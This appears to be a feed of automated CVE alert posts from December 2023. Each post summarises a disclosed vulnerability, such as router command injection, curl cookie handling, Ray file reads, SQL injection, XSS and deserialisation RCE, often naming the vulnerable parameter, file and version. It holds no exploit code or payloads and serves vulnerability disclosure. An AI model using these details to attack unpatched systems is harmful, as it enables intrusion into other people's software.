🚨 CVE-2023-48804In TOTOLINK X6000R V9.4.0cu.852_B20230719, the shttpd file, sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function when passed to the CsteSystem function creates a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-07 01:29:56 |
🚨 CVE-2023-46218This flaw allows a malicious HTTP server to set "super cookies" in curl thatare then passed back to more origins than what is otherwise allowed orpossible. This allows a site to set cookies that then would get sent todifferent and unrelated sites and domains.It could do this by exploiting a mixed case flaw in curl's function thatverifies a given cookie domain against the Public Suffix List (PSL). Forexample a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.🎖@cveNotify |
|
| 2023-12-07 00:30:34 |
🚨 CVE-2023-6566Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.🎖@cveNotify |
|
| 2023-12-06 23:29:56 |
🚨 CVE-2023-46353In the module "Product Tag Icons Pro" (ticons) before 1.8.4 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The method TiconProduct::getTiconByProductAndTicon() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.🎖@cveNotify |
|
| 2023-12-06 22:30:09 |
🚨 CVE-2023-42675In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-06 22:30:02 |
🚨 CVE-2023-42671In imsservice, there is a possible way to write permission usage records of an app due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-06 22:30:01 |
🚨 CVE-2022-48464In wifi service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-06 22:29:57 |
🚨 CVE-2022-48462In wifi service, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed🎖@cveNotify |
|
| 2023-12-06 22:29:56 |
🚨 CVE-2023-4586A vulnerability was found in the Hot Rod client. This security issue occurs as the Hot Rod client does not enable hostname validation when using TLS, possibly resulting in a man-in-the-middle (MITM) attack.🎖@cveNotify |
|
| 2023-12-06 21:30:02 |
🚨 CVE-2023-6020LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023🎖@cveNotify |
|
| 2023-12-06 21:30:01 |
🚨 CVE-2023-6021LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023🎖@cveNotify |
|
| 2023-12-06 21:29:57 |
🚨 CVE-2023-48094A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim's browser via sending a crafted payload to /container_files/public_html/doc/index.html. NOTE: the vendor’s position is that Apps/Sandcastle/standalone.html is part of the CesiumGS/cesium GitHub repository, but is demo code that is not part of the CesiumJS JavaScript library product.🎖@cveNotify |
|
| 2023-12-06 21:29:56 |
🚨 CVE-2023-34540An issue discovered in Langchain before 0.0.225 allows attacker to run arbitrary code via jira.run('other' substring.🎖@cveNotify |
|
| 2023-12-06 21:00:09 |
🚨 CVE-2023-6464A vulnerability was found in SourceCodester User Registration and Login System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-246614 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-06 21:00:02 |
🚨 CVE-2023-44382October is a Content Management System (CMS) and web platform to assist with development workflow. An authenticated backend user with the `editor.cms_pages`, `editor.cms_layouts`, or `editor.cms_partials` permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to `cms.safe_mode` being enabled can write specific Twig code to escape the Twig sandbox and execute arbitrary PHP. This issue has been patched in 3.4.15.🎖@cveNotify |
|
| 2023-12-06 21:00:01 |
🚨 CVE-2023-44381October is a Content Management System (CMS) and web platform to assist with development workflow. An authenticated backend user with the `editor.cms_pages`, `editor.cms_layouts`, or `editor.cms_partials` permissions who would normally not be permitted to provide PHP code to be executed by the CMS due to `cms.safe_mode` being enabled can craft a special request to include PHP code in the CMS template. This issue has been patched in version 3.4.15.🎖@cveNotify |
|
| 2023-12-06 20:59:57 |
🚨 CVE-2023-28896Access to critical Unified Diagnostics Services (UDS) of the Modular Infotainment Platform 3 (MIB3) infotainment is transmitted via Controller Area Network (CAN) bus in a form that can be easily decoded by attackers with physical access to the vehicle.Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2023-12-06 20:59:56 |
🚨 CVE-2023-5427Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r44p0 through r45p0; Valhall GPU Kernel Driver: from r44p0 through r45p0; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r45p0.🎖@cveNotify |
|
| 2023-12-06 20:30:08 |
🚨 CVE-2023-6463A vulnerability has been found in SourceCodester User Registration and Login System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument first_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246613 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-06 20:30:03 |
🚨 CVE-2023-48886A deserialization vulnerability in NettyRpc v1.2 allows attackers to execute arbitrary commands via sending a crafted RPC request.🎖@cveNotify |
|
| 2023-12-06 20:30:02 |
🚨 CVE-2023-49281Calendarinho is an open source calendaring application to manage large teams of consultants. An Open Redirect issue occurs when a web application redirects users to external URLs without proper validation. This can lead to phishing attacks, where users are tricked into visiting malicious sites, potentially leading to information theft and reputational damage to the website used for redirection. The problem is has been patched in commit `15b2393`. Users are advised to update to a commit after `15b2393`. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-06 20:29:57 |
🚨 CVE-2023-48314Collabora Online is a collaborative online office suite based on LibreOffice technology. Users of Nextcloud with Collabora Online Built-in CODE Server app can be vulnerable to attack via proxy.php. This vulnerability has been fixed in Collabora Online - Built-in CODE Server (richdocumentscode) release 23.5.403. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-06 20:29:56 |
🚨 CVE-2023-6019A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication. The issue is fixed in version 2.8.1+. Ray maintainers' response can be found here: https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-... https://www.anyscale.com/blog/update-on-ray-cves-cve-2023-6019-cve-2023-6020-cve-2023-6021-cve-2023-48022-cve-2023-48023🎖@cveNotify |
|
| 2023-12-06 19:59:57 |
🚨 CVE-2023-46326ZStack Cloud version 3.10.38 and before allows unauthenticated API access to the list of active job UUIDs and the session ID for each of these. This leads to privilege escalation.🎖@cveNotify |
|
| 2023-12-06 19:59:56 |
🚨 CVE-2023-5908KEPServerEX is vulnerable to a buffer overflow which may allow an attacker to crash the product being accessed or leak information.🎖@cveNotify |
|
| 2023-12-06 19:30:02 |
🚨 CVE-2023-43628An integer underflow vulnerability exists in the NTRIP Stream Parsing functionality of GPSd 3.25.1~dev. A specially crafted network packet can lead to memory corruption. An attacker can send a malicious packet to trigger this vulnerability.🎖@cveNotify |
|
| 2023-12-06 19:29:57 |
🚨 CVE-2023-4658An issue has been discovered in GitLab EE affecting all versions starting from 8.13 before 16.4.3, all versions starting from 16.5 before 16.5.3, all versions starting from 16.6 before 16.6.1. It was possible for an attacker to abuse the `Allowed to merge` permission as a guest user, when granted the permission through a group.🎖@cveNotify |
|
| 2023-12-06 19:29:56 |
🚨 CVE-2023-48803In TOTOLINK X6000R V9.4.0cu.852_B20230719, the shttpd file, sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function when passed to the CsteSystem function creates a command execution vulnerability.🎖@cveNotify |
|
| 2023-12-06 19:00:16 |
🚨 CVE-2023-43454An issue in TOTOLINK X6000R V9.4.0cu.652_B20230116 and V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the hostName parameter of the switchOpMode component.🎖@cveNotify |
|
| 2023-12-06 19:00:09 |
🚨 CVE-2023-43089Dell Rugged Control Center, version prior to 4.7, contains insufficient protection for the Policy folder. A local malicious standard user could potentially exploit this vulnerability to modify the content of the policy file, leading to unauthorized access to resources.🎖@cveNotify |
|
| 2023-12-06 19:00:08 |
🚨 CVE-2023-46389LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 Firmware 7.2.4 are vulnerable to Incorrect Access Control via registry.xml file. This vulnerability allows remote attackers to disclose sensitive information on LINX configuration.🎖@cveNotify |
|
| 2023-12-06 19:00:03 |
🚨 CVE-2023-46387LOYTEC electronics GmbH LINX-212 firmware 6.2.4 and LINX-151 firmware 7.2.4 are vulnerable to Incorrect Access Control via dpal_config.zml file. This vulnerability allows remote attackers to disclose sensitive information on Loytec device data point configuration.🎖@cveNotify |
|
| 2023-12-06 19:00:02 |
🚨 CVE-2023-46384LOYTEC electronics GmbH LINX Configurator 7.4.10 is vulnerable to Insecure Permissions. Cleartext storage of credentials allows remote attackers to disclose admin password and bypass an authentication to login Loytec device.🎖@cveNotify |
|
| 2023-12-06 18:59:57 |
🚨 CVE-2023-48894Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.🎖@cveNotify |
|
| 2023-12-06 18:59:56 |
🚨 CVE-2023-47207In Delta Electronics InfraSuite Device Master v.1.0.7, a vulnerability exists that allows an unauthenticated attacker to execute code with local administrator privileges.🎖@cveNotify |
|
| 2023-12-06 18:30:02 |
🚨 CVE-2023-6353Tyler Technologies Civil and Criminal Electronic Filing allows an unauthenticated, remote attacker to upload, delete, and view files by manipulating the Upload.aspx 'enky' parameter.🎖@cveNotify |
|
| 2023-12-06 18:29:57 |
🚨 CVE-2023-6343Tyler Technologies Court Case Management Plus allows a remote, unauthenticated attacker to enumerate and access sensitive files using the tiffserver/tssp.aspx 'FN' and 'PN' parameters. This behavior is related to the use of a deprecated version of Aquaforest TIFF Server, possibly 2.x. The vulnerable Aquaforest TIFF Server feature was removed on or around 2023-11-01. Insecure configuration issues in Aquaforest TIFF Server are identified separately as CVE-2023-6352. CVE-2023-6343 is similar to CVE-2020-9323. CVE-2023-6343 is related to or partially caused by CVE-2023-6352.🎖@cveNotify |
|
| 2023-12-06 18:29:56 |
🚨 CVE-2023-49083cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability. This vulnerability has been patched in version 41.0.6.🎖@cveNotify |
|
| 2023-12-06 18:00:04 |
🚨 CVE-2023-47521Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Max Bond, AndreSC Q2W3 Post Order allows Reflected XSS.This issue affects Q2W3 Post Order: from n/a through 1.2.8.🎖@cveNotify |
|
| 2023-12-06 17:59:57 |
🚨 CVE-2023-26533Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Gesundheit Bewegt GmbH Zippy.This issue affects Zippy: from n/a through 1.6.1.🎖@cveNotify |
|
| 2023-12-06 17:59:56 |
🚨 CVE-2023-49087xml-security is a library that implements XML signatures and encryption. Validation of an XML signature requires verification that the hash value of the related XML-document matches a specific DigestValue-value, but also that the cryptographic signature on the SignedInfo-tree (the one that contains the DigestValue) verifies and matches a trusted public key. If an attacker somehow (i.e. by exploiting a bug in PHP's canonicalization function) manages to manipulate the canonicalized version's DigestValue, it would be possible to forge the signature. This issue has been patched in version 1.6.12 and 5.0.0-alpha.13.🎖@cveNotify |
|
| 2023-12-06 17:30:18 |
🚨 CVE-2023-6393A flaw was found in the Quarkus Cache Runtime. When request processing utilizes a Uni cached using @CacheResult and the cached Uni reuses the initial "completion" context, the processing switches to the cached Uni instead of the request context. This is a problem if the cached Uni context contains sensitive information, and could allow a malicious user to benefit from a POST request returning the response that is meant for another user, gaining access to sensitive data.🎖@cveNotify |
|
| 2023-12-06 17:30:17 |
🚨 CVE-2023-39326A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.🎖@cveNotify |
|
| 2023-12-06 17:30:16 |
🚨 CVE-2023-47453An Untrusted search path vulnerability in Sohu Video Player 7.0.15.0 allows local users to gain escalated privileges through the version.dll file in the current working directory.🎖@cveNotify |
|
| 2023-12-06 17:30:13 |
🚨 CVE-2023-47452An Untrusted search path vulnerability in notepad++ 6.5 allows local users to gain escalated privileges through the msimg32.dll file in the current working directory.🎖@cveNotify |
|
| 2023-12-06 17:30:12 |
🚨 CVE-2023-6375Tyler Technologies Court Case Management Plus may store backups in a location that can be accessed by a remote, unauthenticated attacker. Backups may contain sensitive information such as database credentials.🎖@cveNotify |
|
| 2023-12-06 17:30:11 |
🚨 CVE-2023-48333Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Pluggabl LLC Booster for WooCommerce.This issue affects Booster for WooCommerce: from n/a through 7.1.1.🎖@cveNotify |
|
| 2023-12-06 17:30:07 |
🚨 CVE-2023-5966An authenticated privileged attacker could upload a specially crafted zip to the EspoCRM server in version 7.2.5, via the extension deployment form, which could lead to arbitrary PHP code execution.🎖@cveNotify |
|
| 2023-12-06 17:30:06 |
🚨 CVE-2023-45283The filepath package does not recognize paths with a \??\ prefix as special. On Windows, a path beginning with \??\ is a Root Local Device path equivalent to a path beginning with \\?\. Paths with a \??\ prefix may be used to access arbitrary locations on the system. For example, the path \??\c:\x is equivalent to the more common path c:\x. Before fix, Clean could convert a rooted path such as \a\..\??\b into the root local device path \??\b. Clean will now convert this to .\??\b. Similarly, Join(\, ??, b) could convert a seemingly innocent sequence of path elements into the root local device path \??\b. Join will now convert this to \.\??\b. In addition, with fix, IsAbs now correctly reports paths beginning with \??\ as absolute, and VolumeName correctly reports the \??\ prefix as a volume name. UPDATE: Go 1.20.11 and Go 1.21.4 inadvertently changed the definition of the volume name in Windows paths starting with \?, resulting in filepath.Clean(\?\c:) returning \?\c: rather than \?\c:\ (among other effects). The previous behavior has been restored.🎖@cveNotify |
|
| 2023-12-06 17:00:05 |
🚨 CVE-2023-6442A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file add-phlebotomist.php. The manipulation of the argument empid/fullname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246445 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-06 17:00:04 |
🚨 CVE-2023-47454An Untrusted search path vulnerability in NetEase CloudMusic 2.10.4 for Windows allows local users to gain escalated privileges through the urlmon.dll file in the current working directory.🎖@cveNotify |
|
| 2023-12-06 16:30:25 |
🚨 CVE-2023-36655The login REST API in ProLion CryptoSpike 3.0.15P2 (when LDAP or Active Directory is used as the users store) allows a remote blocked user to login and obtain an authentication token by specifying a username with different uppercase/lowercase character combination.🎖@cveNotify |
|
| 2023-12-06 16:30:24 |
🚨 CVE-2023-22524Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code.🎖@cveNotify |
|
| 2023-12-06 16:30:21 |
🚨 CVE-2023-22523This vulnerability, if exploited, allows an attacker to perform privileged RCE (Remote Code Execution) on machines with the Assets Discovery agent installed. The vulnerability exists between the Assets Discovery application (formerly known as Insight Discovery) and the Assets Discovery agent.🎖@cveNotify |
|
| 2023-12-06 16:30:20 |
🚨 CVE-2023-42916An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 17.1.2 and iPadOS 17.1.2, macOS Sonoma 14.1.2, Safari 17.1.2. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.🎖@cveNotify |
|
| 2023-12-06 16:30:19 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2023-12-06 15:30:06 |
🚨 CVE-2023-48859TOTOLINK A3002RU version 2.0.0-B20190902.1958 has a post-authentication RCE due to incorrect access control, allows attackers to bypass front-end security restrictions and execute arbitrary code.🎖@cveNotify |
|
| 2023-12-06 15:30:02 |
🚨 CVE-2023-47870Cross-Site Request Forgery (CSRF), Missing Authorization vulnerability in gVectors Team wpForo Forum wpforo allows Cross Site Request Forgery, Accessing Functionality Not Properly Constrained by ACLs leading to forced all users log out.This issue affects wpForo Forum: from n/a through 2.2.6.🎖@cveNotify |
|
| 2023-12-06 15:30:01 |
🚨 CVE-2023-31230Cross-Site Request Forgery (CSRF) vulnerability in Haoqisir Baidu Tongji generator allows Stored XSS.This issue affects Baidu Tongji generator: from n/a through 1.0.2.🎖@cveNotify |
|
| 2023-12-06 15:30:00 |
🚨 CVE-2023-39166Cross-Site Request Forgery (CSRF) vulnerability in tagDiv tagDiv Composer allows Cross-Site Scripting (XSS).This issue affects tagDiv Composer: from n/a before 4.4.🎖@cveNotify |
|
| 2023-12-06 14:30:27 |
🚨 CVE-2023-32268Exposure of Proxy Administrator CredentialsAn authenticated administrator equivalent Filr user can access the credentials of proxy administrators.🎖@cveNotify |
|
| 2023-12-06 14:00:14 |
🚨 CVE-2023-48930xinhu xinhuoa 2.2.1 contains a File upload vulnerability.🎖@cveNotify |
|
| 2023-12-06 14:00:07 |
🚨 CVE-2023-28875A Stored XSS issue in shared files download terms in Filerun Update 20220202 allows attackers to inject JavaScript code that is executed when a user follows the crafted share link.🎖@cveNotify |
|
| 2023-12-06 14:00:06 |
🚨 CVE-2023-49283microsoft-graph-core the Microsoft Graph Library for PHP. The Microsoft Graph Beta PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php`. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in version 2.0.2. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php` file, remove access to the /vendor directory, or disable the phpinfo function🎖@cveNotify |
|
| 2023-12-06 14:00:05 |
🚨 CVE-2023-49282msgraph-sdk-php is the Microsoft Graph Library for PHP. The Microsoft Graph PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The phpInfo function exposes system information. The vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. This vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. The combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data. This problem has been patched in versions 1.109.1 and 2.0.0-RC5. If an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds: delete the `vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php` file, remove access to the `/vendor` directory, or disable the phpinfo function.🎖@cveNotify |
|
| 2023-12-06 14:00:02 |
🚨 CVE-2023-49297PyDrive2 is a wrapper library of google-api-python-client that simplifies many common Google Drive API V2 tasks. Unsafe YAML deserilization will result in arbitrary code execution. A maliciously crafted YAML file can cause arbitrary code execution if PyDrive2 is run in the same directory as it, or if it is loaded in via `LoadSettingsFile`. This is a deserilization attack that will affect any user who initializes GoogleAuth from this package while a malicious yaml file is present in the same directory. This vulnerability does not require the file to be directly loaded through the code, only present. This issue has been addressed in commit `c57355dc` which is included in release version `1.16.2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-06 14:00:01 |
🚨 CVE-2023-44221Improper neutralization of special elements in the SMA100 SSL-VPN management interface allows a remote authenticated attacker with administrative privilege to inject arbitrary commands as a 'nobody' user, potentially leading to OS Command Injection Vulnerability.🎖@cveNotify |
|
| 2023-12-06 14:00:00 |
🚨 CVE-2023-6438A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /WebArticle/articles/ of the component Like Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-246438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-06 13:30:10 |
🚨 CVE-2023-22523This vulnerability, if exploited, allows an attacker to perform privileged RCE (Remote Code Execution) on machines with the Assets Discovery agent installed. The vulnerability exists between the Assets Discovery application (formerly known as Insight Discovery) and the Assets Discovery agent.🎖@cveNotify |
|
| 2023-12-06 13:30:05 |
🚨 CVE-2023-48749Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Theme nectar Salient Core allows Stored XSS.This issue affects Salient Core: from n/a through 2.0.2.🎖@cveNotify |
|
| 2023-12-06 13:30:04 |
🚨 CVE-2023-48746Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles allows Reflected XSS.This issue affects Community by PeepSo – Social Network, Membership, Registration, User Profiles: from n/a through 6.2.6.0.🎖@cveNotify |
|
| 2023-12-06 12:30:08 |
🚨 CVE-2023-6298** DISPUTED ** A vulnerability classified as problematic was found in Apryse iText 8.0.2. This vulnerability affects the function main of the file PdfDocument.java. The manipulation leads to improper validation of array index. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier of this vulnerability is VDB-246124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. A statement published afterwards explains that the exception is not a vulnerability and the identified CWEs might not apply to the software.🎖@cveNotify |
|
| 2023-12-06 09:30:22 |
🚨 CVE-2023-49246Unauthorized access vulnerability in the card management module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-06 09:30:21 |
🚨 CVE-2023-49244Permission management vulnerability in the multi-user module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-06 09:30:16 |
🚨 CVE-2023-49242Free broadcast vulnerability in the running management module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-06 09:30:15 |
🚨 CVE-2023-49239Unauthorized access vulnerability in the card management module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-06 09:30:11 |
🚨 CVE-2023-46688Open redirect vulnerability in Pleasanter 1.3.47.0 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary web sites via a specially crafted URL.🎖@cveNotify |
|
| 2023-12-06 09:30:10 |
🚨 CVE-2023-44113Vulnerability of missing permission verification for APIs in the Designed for Reliability (DFR) module. Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-12-06 09:30:09 |
🚨 CVE-2023-44099Vulnerability of data verification errors in the kernel module. Successful exploitation of this vulnerability may cause WLAN interruption.🎖@cveNotify |
|
| 2023-12-06 09:30:05 |
🚨 CVE-2023-28477Concrete CMS (previously concrete5) versions 8.5.12 and below, and 9.0 through 9.1.3 is vulnerable to stored XSS on API Integrations via the name parameter.🎖@cveNotify |
|
| 2023-12-06 09:30:04 |
🚨 CVE-2023-28473Concrete CMS (previously concrete5) versions 8.5.12 and below, and 9.0 through 9.1.3 is vulnerable to possible Auth bypass in the jobs section.🎖@cveNotify |
|
| 2023-12-06 08:29:56 |
🚨 CVE-2023-28472Concrete CMS (previously concrete5) versions 8.5.12 and below, and 9.0 through 9.1.3 does not have Secure and HTTP only attributes set for ccmPoll cookies.🎖@cveNotify |
|
| 2023-12-06 07:29:56 |
🚨 CVE-2023-2861A flaw was found in the 9p passthrough filesystem (9pfs) implementation in QEMU. The 9pfs server did not prohibit opening special files on the host side, potentially allowing a malicious client to escape from the exported 9p tree by creating and opening a device file in the shared folder.🎖@cveNotify |
|
| 2023-12-06 05:29:57 |
🚨 CVE-2023-22524Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code.🎖@cveNotify |
|
| 2023-12-06 05:29:56 |
🚨 CVE-2023-22522This Template Injection vulnerability allows an authenticated attacker, including one with anonymous access, to inject unsafe user input into a Confluence page. Using this approach, an attacker is able to achieve Remote Code Execution (RCE) on an affected instance. Publicly accessible Confluence Data Center and Server versions as listed below are at risk and require immediate attention. See the advisory for additional detailsAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.🎖@cveNotify |
|
| 2023-12-06 04:29:56 |
🚨 CVE-2023-40053A vulnerability has been identified within Serv-U 15.4 that allows an authenticated actor to insert content on the file share function feature of Serv-U, which could be used maliciously.🎖@cveNotify |
|
| 2023-12-06 03:30:03 |
🚨 CVE-2023-48321Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ahmed Kaludi, Mohammed Kaludi AMP for WP – Accelerated Mobile Pages allows Stored XSS.This issue affects AMP for WP – Accelerated Mobile Pages: from n/a through 1.0.88.1.🎖@cveNotify |
|
| 2023-12-06 03:30:02 |
🚨 CVE-2023-48272Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Maspik – Spam Blacklist allows Stored XSS.This issue affects Maspik – Spam Blacklist: from n/a through 0.9.2.🎖@cveNotify |
|
| 2023-12-06 03:29:57 |
🚨 CVE-2023-43788A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.🎖@cveNotify |
|
| 2023-12-06 03:29:56 |
🚨 CVE-2020-12965When combined with specific software sequences, AMD CPUs may transiently execute non-canonical loads and store using only the lower 48 address bits potentially resulting in data leakage.🎖@cveNotify |
|
| 2023-12-06 03:00:04 |
🚨 CVE-2023-47877Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Perfmatters allows Stored XSS.This issue affects Perfmatters: from n/a before 2.2.0.🎖@cveNotify |
|
| 2023-12-06 02:59:59 |
🚨 CVE-2023-47875Cross-Site Request Forgery (CSRF) vulnerability in Perfmatters allows Cross Site Request Forgery.This issue affects Perfmatters: from n/a through 2.1.6.🎖@cveNotify |
|
| 2023-12-06 02:59:58 |
🚨 CVE-2023-6026A Path traversal vulnerability has been reported in elijaa/phpmemcachedadmin affecting version 1.3.0. This vulnerability allows an attacker to delete files stored on the server due to lack of proper verification of user-supplied input.🎖@cveNotify |
|
| 2023-12-06 02:30:08 |
🚨 CVE-2023-6511Inappropriate implementation in Autofill in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-12-06 02:30:07 |
🚨 CVE-2023-6508Use after free in Media Stream in Google Chrome prior to 120.0.6099.62 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-06 02:30:03 |
🚨 CVE-2023-48940A stored cross-site scripting (XSS) vulnerability in /admin.php of DaiCuo v2.5.15 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.🎖@cveNotify |
|
| 2023-12-06 02:30:02 |
🚨 CVE-2023-40211Exposure of Sensitive Information to an Unauthorized Actor vulnerability in PickPlugins Post Grid Combo – 36+ Gutenberg Blocks.This issue affects Post Grid Combo – 36+ Gutenberg Blocks: from n/a through 2.2.50.🎖@cveNotify |
|
| 2023-12-06 02:30:01 |
🚨 CVE-2023-37972Exposure of Sensitive Information to an Unauthorized Actor vulnerability in MultiVendorX Product Stock Manager & Notifier for WooCommerce.This issue affects Product Stock Manager & Notifier for WooCommerce: from n/a through 2.0.1.🎖@cveNotify |
|
| 2023-12-06 02:29:57 |
🚨 CVE-2023-6027A critical flaw has been identified in elijaa/phpmemcachedadmin affecting version 1.3.0, specifically related to a stored XSS vulnerability. This vulnerability allows malicious actors to insert a carefully crafted JavaScript payload. The issue arises from improper encoding of user-controlled entries in the "/pmcadmin/configure.php" parameter.🎖@cveNotify |
